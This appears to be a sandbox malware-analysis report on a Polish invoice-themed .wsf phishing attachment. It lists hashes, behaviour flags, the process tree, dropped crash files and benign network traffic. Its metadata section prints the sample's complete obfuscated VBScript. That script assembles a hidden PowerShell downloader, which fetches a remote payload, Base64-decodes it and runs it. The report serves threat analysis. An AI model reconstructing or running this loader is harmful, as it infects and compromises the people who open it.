File name:

Wniosek o numer faktury.wsf

Full analysis: https://app.any.run/tasks/37e36a66-2e18-4e93-a9fa-24cddb631ba7
Verdict: Malicious activity
Analysis date: October 07, 2024, 10:35:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with CRLF line terminators
MD5:

B3A1ADC2EAB232BDDFE5149B896AF1C8

SHA1:

BE84A3BB6ABE9B87CD90AF27CA5574DAE9607D48

SHA256:

55D2F245A0B7975884B7E5BBF284BCB72CC1514A726EB6988A1CA1E1E429CFB4

SSDEEP:

384:vvjOLjVGaVToUC5DX/FTZjkp6d+Ume68lh6x6orij59EUqAoWD7yQZ1Mm3IZLxVi:njOLjVGaVToUC5r/FTZwp6d+Ume68lh7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 5088)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5088)
    • Executes application which crashes

      • wscript.exe (PID: 5088)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5088)
    • The process creates files with name similar to system file names

      • WerFault.exe (PID: 2540)
  • INFO

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2540)
    • Reads the software policy settings

      • WerFault.exe (PID: 2540)
    • Checks proxy server information

      • WerFault.exe (PID: 2540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.wsf | Windows Script File (61.5)
.xml | Generic XML (ASCII) (38.4)

EXIF

XMP

JobId: Objektiverendes
JobScriptLanguage: VBScript
JobScript: ' Private Const Helnodes = -21686 Private Const Lnnedgang = 1562 Private Const dekuprsave = 18205 Private Const Chondralgia = &HB29E Private Const Gloominess = &HFFFFEB15 Private Const Ladeskinne = &H573D Private Const Barrowful = "stere? boehmenite" Private Const Dkstillingerne = 55957 Private Const Stammernes = "Dignitar: embergoose," Private Const Soundheaded = "Unventuresome? weighhouse" Private Const Croisad = -35829 Private Const Bugserbaads = -59145 Private Const Indgangstransformatoren = &H3B8D Private Const Shirtingers = &HFFFFAE04 Private Const Udspndes = &HFFFFA137 Private Const Konsekvensndret = &HFFFF08EF Private Const Bagepulvere = "Tarantas; tyndhudet?" Private Const Fortrdelige = -31607 Private Const Bedfordshire = &HBFFB Private Const Timebudgetternes = "Lip? kammerjgere" Function Opinionsanalyse(Philippes, Thalassiarch ,Gent ) Set Flottet = CreateObject("VBScript.RegExp") Flottet.Global = True Fortunetellersta = FreeFile Flottet.Pattern = Thalassiarch Opinionsanalyse = Flottet.Replace(Philippes, Gent) End Function Unvatted = Deservedly for Pylic=0 to 3837432 Pylic=Pylic+1 next Call Olsharper("<#Semicellulous Sasia Acassysblsningers cassysorticassysication Ungarbejderens #>;$Jestenenes='sollege") rugningensplatte = FormatCurrency(7660461) Call Olsharper("me';<#Perspiration Widish Redobles cossoresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'P") Call Olsharper("rivateData';Icassys ($Bromatologiens) {$Boutonnieres++;}cassysunction Citationstegnet($Praepuce){$co") Call Olsharper("ssirewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; cassysor( $Udcassysladningerne1=7;$Udcassysla") Call Olsharper("dningerne1 -lt $cossirewarden117;$Udcassysladningerne1+=8){$Beritt='Acassyscassysaldsbortska") Call Olsharper("cassyscassyselsesomraaderne';$cassysumitories+=$Praepuce[$Udcassysladningerne1];$Exsectile='Impi") Call Olsharper("eties';}$cassysumitories;}cassysunction Humiria($Skdecassysrakkernes){ . ($Kaste) ($Skdecassysra") Undrubbedeclipsesurfridin = FormatCurrency(3281156) Call Olsharper("kkernes);}$Udcassysladningerne1vyberry=Citationstegnet 'ChiencassysoMWingle o cossrkapszSkyttesi") Call Olsharper("Nonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrig") Call Olsharper("dUcassysrihedojubilizw angcassysorsAtletis NedslagNBedrageT Decassysade Kuponen1Teredos0,budent.Cyber") Navnefllerneattester = Navnefllerneattester + 6425880 Call Olsharper("cu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4cos") Call Olsharper("sricassysind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 ecassysleks1 Neutra.Recons 0H lvled) Compos") Call Olsharper(" esuetuG Bortcassys eO.gngelcSoricidkVolcanooZonesys/Glosser2cossorvold0Turloug1Melleml0 nie,zs0G,lvano1c") Call Olsharper("oss lthro0 Ristni1Landbru Lommer,cossSkalkesi Sel,plrTorskeneHydrocassysocassysKonditoosidero") Call Olsharper("cx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'Pr") Call Olsharper("opounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBuscassysor eViewyyaN HercogTLrerudd ';$Maalest") Call Olsharper("ationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wcassysulle/.rocaic/PuppetlsJacalsii") Kulissereryonres = RTrim("Mderet") Call Olsharper(" coss,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongcass") Call Olsharper("yseluDyrtidsgAcassysgrelslThro,doa nicassysormn charondPrecassysectiTv,ngsinEksdik..Kin.redxType odtkristanpI") Call Olsharper("nd ull ';$Terroristens=Citationstegnet 'ecassyst rml>Deseca ';$Kaste=Citationstegnet 'U derviicepha") Call Olsharper("loeLaiciziX Percassysor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Acassyst';Humiria (Citations") Call Olsharper("tegnet 'Hecassyst,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRecas") Call Olsharper("sysas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero Mor") Call Olsharper("cassysinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerI") Call Olsharper("nd cassysry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPcoss cellid StorstAEgomanit Sku") Call Olsharper(" spAMe,meri+ Pander$LinguovDKlvandkaBellicassyserGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (C") Call Olsharper("itationstegnet 'Viziera$AdemonigPr teicassysLArbejdeoVan cassysribMixologaAcassyskodnilUnderme:Regnecassysu") Call Olsharper("UaksiomaPIncongeS cosso beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada Veg") Call Olsharper("etaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAcassyscassys") Call Olsharper("aldsNSympatiEOverlegscossastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Acas") Call Olsharper("sys,tantUnarcheeSilikatrB sgader,hasiluocossremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlo") Call Olsharper("dser)Strepto ');Humiria (Citationstegnet 'Contral[ SandblnYawl nkEXiphipltAartier. ,erpenS cossla.gi") Call Olsharper("eVictorir StatsvvPo ygeniS philiCBlacassyscassyse eModulvip ensdyrO bil igiBlokadeNCholecyTLovprisMHjhlet") Call Olsharper("cassysAcossibroelNN edlemaLongbowgHv,skedEJamborerTrktjet]philomu:Elcassysorsy:b,ckbussBraiser") Call Olsharper("EGlyconeCSkeletouSingul.RNationaIjedd,hitCommin.yHu tankpSwoosheRHydro,lo TidtagtNonshatOcassysr dm") Call Olsharper("meC Jor,broHaleweelUdsprin Boldtre=Pteropu Strejcassys[Ve.nacuNMizenmaeTranquiT Anostr.Rationas ") Call Olsharper("D.shalE nowbloCcosslus erUcossluktueRUsheriaITekstilTEpi idyyShedmanPJydepotr But,ksOH.lotriTAg rn") Call Olsharper("suOLivskracSpilledois andsLGenetabTUntwitcYcrestsrPHoodshyELredren] gldssa:homemak:cossorm ddT Bra,e") Call Olsharper("tLMellemcassyss Abdomi1Uncoaxe2 Supercassys ');$Maalestationernes=$Upsettal[0];$eupnoeic=(Citationsteg") Call Olsharper("net 'Po tula$ Spermag ,alataLSlvstolOIntell.b W,nderaChecassysk nLWrangle:Vildtdidcossluviale demi aAPotholer") Call Olsharper(" VedersYcossluor s2 Lovreg3Sprogkl3Rayonna=undervinslambeheNectriaW Subung- PeroliO WoolieBLgn") Call Olsharper("ehisJGarapateUna brec uggenttT ermot HymenopsOppo itY A.minisS.rivelt eemanaEDe ennimPatriar.War") Call Olsharper(" letnTabelleErivettitcoss,rstan.Listep WVinderteOverstiBDri,tsiC SponsoLColaensI S.cialE Rec icassysNacassysv") Renegationungyvetange = Renegationungyvetange & "Occidentality" & "Auxiliarly" Call Olsharper("ikliTUdydsva ');Humiria ($eupnoeic);Humiria (Citationstegnet 'Gulliut$u graveDMidshipe ste peaSourtoprs,pramay") Call Olsharper("Leverin2Dehydra3Adjuvat3 Sa men.Gr ynesHRichn.seSejpinea,ranchedSubmerge Rets.rrSekundasGopural[Slyn") Call Olsharper("g i$andenklAHypapoppDagsprirAa enhjiCounterlSacassysthols lapsenter,itoaRtehalmrbagecassysors pa") Call Olsharper("rdie1Gungrem9cosse mate0Sl bnin]p.theca= Stepd.$Guas.alUPalewi d Abb.evcassys SelvhelSacricass") Call Olsharper("ysia.pectrudTele henSpectroiHom,nymnSappa wgHurriexeAntimonrPoachernseasonaeOverr s1Perspekv har") Call Olsharper("teryBlo rigb Retroce cossoliarr TambalrDelkredyBilledcassys ');$Venskabsbyen=Citationstegnet 'U") Call Olsharper("n.erkb$ .hylloD Morbi eShrewisa cossortolr eitonoy nderpa2cossructuo3 Marche3Ectopla. RosewoDEksilero ") Harefootpaternostercer = Left("Binres",39) Call Olsharper("Ngleomw Nonradn CountelcossabrikaoOverocassyscassysaSulphiddIrmamrkcoss anensciDr ntcassysolcossredrikebogklub") Call Olsharper("(Sammens$LarrikiMDosmerna Sundh,aVan.lbslSanselie Sele.tsDobbelttVigint avagrantt H.rejuiConvivio") Call Olsharper("InddmconUnmembee Ma dskr blytkkn Popul.eValewarsHo.shan,Trykblg$EcassysterviRBararmeuSkacassys,esbcos") Call Olsharper("sorcassysl,di DemonoaDemountc cossuturoeblndramaChronise Rednin) Egensk ';$Rubiaceae=$administrationspro") Call Olsharper("grammer;Humiria (Citationstegnet 'Ev ngel$ Ta,ellgSnitselLDiscandoEkstre.BStin svaSplenolLMedh.lp:P o") Call Olsharper("letaoShahe,scossKipkalvcassysPolygamICensurkCotiticei ServieaUnderudlKbslaaaVMunsicassysciOverlu") Call Olsharper("bR LeachekSubsistsMesonepOBla dinMSubramohE.aarigEcossuglehaDBronchoE Eksperr Social4 Roligt4 O") Call Olsharper("vertr=Horaten(Kat,batTcossoxtrotE QuisquS NominatD sbenc-VarselsP BetingA cossore.dtComitatHParthen egelis$Tr") Call Olsharper("stubbRSpeedomuSelenosBDesig.cassysiRedemptA Appetic Trans eGodsterAPillorieVejenkl)Kvgbrug ');while") Call Olsharper(" (!$Ocassyscassysicialvirksomheder44) {Humiria (Citationstegnet ' Opretn$Expand.gBoozinelK ivkamo") Call Olsharper("Minim.rbOtocystapleasaulAdviser:Mo omolC UdgicassystoGobblinlSkibsr,lDioicouy evggrub pleopoadigono =Tilsp") Call Olsharper(".r$Pyoi betcocassysi.anr Kategou antiscePhospho ') ;Humiria $Venskabsbyen;Humiria (Citationst") Call Olsharper("egnet 'S,lowviSChristiTTransisaRehoninr,valiteTcossintede-Unikae s,latycnLVert biE,acrameeQuinovopClinoph Dom") Call Olsharper("ajig4Calatra ');Humiria (Citationstegnet ' Bilbre$ atsdekgAegteskl SlagteOSocio oBS,lerodAVulg") Call Olsharper("ariLWorkbas:snowshaO ndisccossCatchplcassys Str cassysoI Kryst cDicotylIModarb aDenouncLheraldrvSa") Call Olsharper("cketcI S outerAnticorkLag rbeSTeasellOLmmelstmPre,onshcircumseUn ulatdpolemoseSu ernirIndlagt4Tonnens") Femtenaarsfdselsdag = RTrim("Haft") Call Olsharper("4Beruser=Synsv d(ZarerviTBesl tnESmilerhSunst inT skricassyst-cossalshvlp sldrevaHengivetBlokbebh Isohe") Call Olsharper("s Raekker$Mu ticyrOverv,ruT,lentcassysb aniskeiSedimenAcossodl ngcBino,iaEOverrelasavoroueKr") Call Olsharper("i.sra)Non pos ') ;Humiria (Citationstegnet 'Indremi$BitestiG InspirLTumidito TrbeskbGenyantacoss rbrydLBerr") Call Olsharper("ing:Bet gensPenta eCIvrkstthEksportO onsillo utpresLMark nghHyperviOUninterUDe,ainaskancelle") Call Olsharper("Klag adSCiril o=D meskr$ nruddgUn,ordyLMudde,pOGottharBHospitaAInkorpoL Deta h:underdeo a ribrrUnappreih") Call Olsharper("ustankSSstridspRagoutehHaartopEEntreprRUn.ougheRepelli+Ceylone+cossednmag%Ydmyg.d$DiapnotULov stePUn") Grahamsbrdsneurodiagnos = FormatDateTime("6-6-6") Call Olsharper(" selisSammensEcum,noiTcossluidist TroposAAl,mnollMouseba. T lhoec IndsyoO SlidsoUTrivia NSpacecrTindvend '") breakfastsshuntmodsta = Trim("Pygmer") Call Olsharper(") ;$Maalestationernes=$Upsettal[$schoolhouses];}$Ecassyscassysektcassysuld=311542;$Garnnglers") Call Olsharper("=33970;Humiria (Citationstegnet 'cosslad.ng$ almebgGUdkoblelPintaskO BrobygBOpvejeraUncon.ilU lev") Call Olsharper("el:cossa ulteETndrrsnm Sabba bUdenrigRkyllin OEndocriSMagi.trc VidereOHombretPweed inI Surcassys") Call Olsharper("edCPa ynol cossolk re= En.old cossasanhnGThal aneNy ansktVelkoms-SkenderCInrusheo jertesN KontorT") Call Olsharper("Buti keeNo ditanChungviTOmstnin Udrug $TestamerTonikaeUBackarrBSkribleiKlemat aUbekrcassystCRandomiECoinquia") Maximizeskkebaandscr120 = Maximizeskkebaandscr120 & "Alkoholoplysning" Call Olsharper("A ylemiePerspek ');Humiria (Citationstegnet '.mmodyt$RealitegBlackgulheteroco Rkvrkeb BropenaStngelelN") Forbnnerfremlysn = FormatNumber(7009901) Call Olsharper("ucleat:tapaderSSocialleOlcassysactymSej brtiUnhonesnRubbereiashilymsYalelaatR books2Clodpol4ca") Call Olsharper("ntr p3racehes Dogmat=Pilpais Dagacassyssn[CurricuSRubblinyCranke swired,atNonlique cassysorgivmunridab.Exqu") Call Olsharper("isiCC shkluo BalletnSynta svAnegalle oupetcassysrBrisjabtReh ecassyso]Licassyse,ty: Andrag:Unsearcco") Call Olsharper("ssAgurksprDueske o Ci clemSquamygBGipsdepaEuropaksO cassyswhiteS,upnecassys6Kimissv4indkbsaS nplankt pro") Call Olsharper("accrSagncassysigiNic namnCel ermgTim lia(Inexora$panningEPa elunmP stinsbDronninrcossortidsoGraph") Call Olsharper("ics Percenc Soci loPreindupKur,udviMyndighcGossame)cossorvist ');Humiria (Citationstegnet 'cosso") Call Olsharper("ldout$SparepegAlkylolLSenilisoBippeneBDumpnina LaparoLSide il:LangvarL usstano Pe minO Adoni.KLeuk") Call Olsharper("oseDSkrte uoSjlevanWIlcassysrdignGamblessUntissu Harpun =Wickycassyso Debyein[ Re ncassysrsKlagd") Call Olsharper("ocyKommuneS DesserT angsveeEquilinmP ulina.RugbyenTPapirdoe BrugerXTilrettt S yros.Begyn.eeP") Call Olsharper("redissnTachomeC onstorORodetcodDipoleri MdeacassystnRungendgAchokes] Jordvo:uvurder: Nonat A") Call Olsharper("Bill.dhsDiluviuCHyponomiTomasteIOreocar.gencassysoreGPeritoneEbelt,cassystTrehedesVenligstVi tigtR") Call Olsharper(" BanabaILisabetNtehuecoGNonstat(omstill$ AntigeS DuridiEVertikaMHageskgIPropinqn O helcIIskagemS Hex") Call Olsharper("ad tUn slaa2 okalp4cossorthse3u adjus)Looking ');Humiria (Citationstegnet 'Phototy$CatchphG VidtlcassysLMedde") Call Olsharper("lso TintinbDacapona BecassysrieLKanjist:TmrermeNcossrangibO BettonN askincassysCHygiejna SlabbenNonre") Call Olsharper("seDReallnnIHjssoneDRekapitaStude rT tearinEUdgivelScossorhand=Knnessk$ EkkololPostninO anim l") Call Olsharper("ocossibrillKCepcassysorsdElianasO destitWComminuNhobbyi S Inju i.cosslakonesEkstr.oUApothecbDevalueSPa") Lagrerdemarcaturerepen3 = Command Call Olsharper("ra idTNicolaiRDr,vtmmiUdligniNDivertiGRecoils( hasian$Ni htimE,yromancassys ammenkcassysTora") Call Olsharper("erseMyer,orK BenzintRecassysusercassys artoonuHorsecrLRitteniD Obispo,Udenla $ HyrekrgGedesk,A") Call Olsharper("DaaredertankangnDanielun PejoraG SkatteLSwe.tieeHyaluror RdkaalS ortari)Unhaggl ');Humiria $Noncandidates;") Inertlyartlinepiruette = Command Set resocialiseringsinstitutioner = CreateObject("WScript.Shell") Set Sverigerejses132 = resocialiseringsinstitutioner.Exec("cmd.exe /c ping 6777.6777.6777.677e") Do While Sverigerejses132.Status = 0 WScript.Sleep 100 Loop Select Case Sverigerejses132.Status Case 1 Opsnappe = Sverigerejses132.StdOut.ReadAll() End Select Stammoren = Instr(1,Opsnappe,"6777") Stammoren = mid(Opsnappe,Stammoren,4) For i = 0 to Stammoren calyces = calyces & "w" next Kahunaskoordina = TimeSerial(19,165,20) Stammoren = Instr(1,Opsnappe,"e") Stammoren = mid(Opsnappe,Stammoren,1) Unvatted = Opinionsanalyse(Unvatted,"cassys","f") Unvatted = Opinionsanalyse(Unvatted,"coss","F") Bundlesorkanstyrkefdrela = "Fiskeriterritoriet" Bundlesorkanstyrkefdrela = Replace(Bundlesorkanstyrkefdrela,"Skemalggende","Nonagon") Skeletteringerne41 = Stammoren + "r"+ Tridii(115) + "he" + Tridii(108) + Tridii(108) + Tridii(32) + Tridii(34) + Unvatted + Tridii(34) Call resocialiseringsinstitutioner.Run("po" + mid(calyces,6776,1) & Skeletteringerne41,0) Function Olsharper (Helvellic) Salingerstegnhjde = Right("Revserne",186) Unvatted = Unvatted + Helvellic Gringernecullyingerstatte = FormatDateTime("8/8/8") End function Undergangenezoop = TimeValue("20:20:20") Function Tridii (Helvellic) Enklavenunderjawsunp154 = FreeFile Tridii = chrW(Helvellic) End function Plodgastroparietalhou = FormatDateTime("3/3/3") '
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
8
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe cmd.exe no specs conhost.exe no specs ping.exe no specs werfault.exe sppextcomobj.exe no specs slui.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
360\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1076ping 6777.6777.6777.677eC:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
2540C:\WINDOWS\system32\WerFault.exe -u -p 5088 -s 1060C:\Windows\System32\WerFault.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
4688"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5088"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Wniosek o numer faktury.wsf"C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
3221225477
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5524C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
6992cmd.exe /c ping 6777.6777.6777.677eC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
7116C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
4 309
Read events
4 309
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2540WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_WScript.exe_ab41265b99a095d18af7c1be13d4ef881ed4_debcac4a_a70d5a9e-7a3c-41c5-bba8-ddd865ae3ab9\Report.wer
MD5:
SHA256:
2540WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\21253908F3CB05D51B1C2DA8B681A785der
MD5:1B7FD5177461034E4086724C5845E927
SHA256:065AF18C229898A1C2A8D989911ADCD9B1E2AB14B1953EBF8EAF34AE37EA1627
2540WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37C951188967C8EB88D99893D9D191FEbinary
MD5:FB64A9EBEDF48D3895381D5B7D80743D
SHA256:EA21D495930AD76F267A33A0F593DBF0C7EA75E457FCAE49A29DAAD8BD920F42
2540WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WER5C46.tmp.dmpbinary
MD5:DB4E8D7CE7F3D43B1432BDD5CFE0E03B
SHA256:D9373908B7B28816520E7017D3FFD3AF185F242DEB3EF2E336B05425A212809B
2540WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\wscript.exe.5088.dmpdmp
MD5:68FFB381DC8F0EDB31E2A5751AEE64DF
SHA256:65B3EDBE5414845892BDA2B0F2BAA16CB8C124C0818EA27B5A49646240BF3B3D
2540WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21253908F3CB05D51B1C2DA8B681A785binary
MD5:2DABA3033034B461289A4153B8715150
SHA256:57B519C6EC0FBB65A4CC7DC5D98404107607374714A34CF47D2CA97485A77CCD
2540WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WER5DB0.tmp.xmlxml
MD5:2AA7807C0AB4669FAEF324E9F156205A
SHA256:B423F9F1E3EE2ECCE87C96DB46DC4E2275A5D18582F3758835B4F2D8A185524B
2540WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WER5D8F.tmp.WERInternalMetadata.xmlxml
MD5:E3073FD29BC1651B7F912FFBF0998FB8
SHA256:723EE98C5678A65070615C1AACED39871C0FE53D5C75CE7661F1276FA357EE19
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
50
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3464
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2540
WerFault.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2420
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2420
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2632
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2212
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2356
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2120
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
3464
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2540
WerFault.exe
20.189.173.20:443
watson.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2540
WerFault.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
2632
svchost.exe
20.190.159.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
  • 51.104.136.2
whitelisted
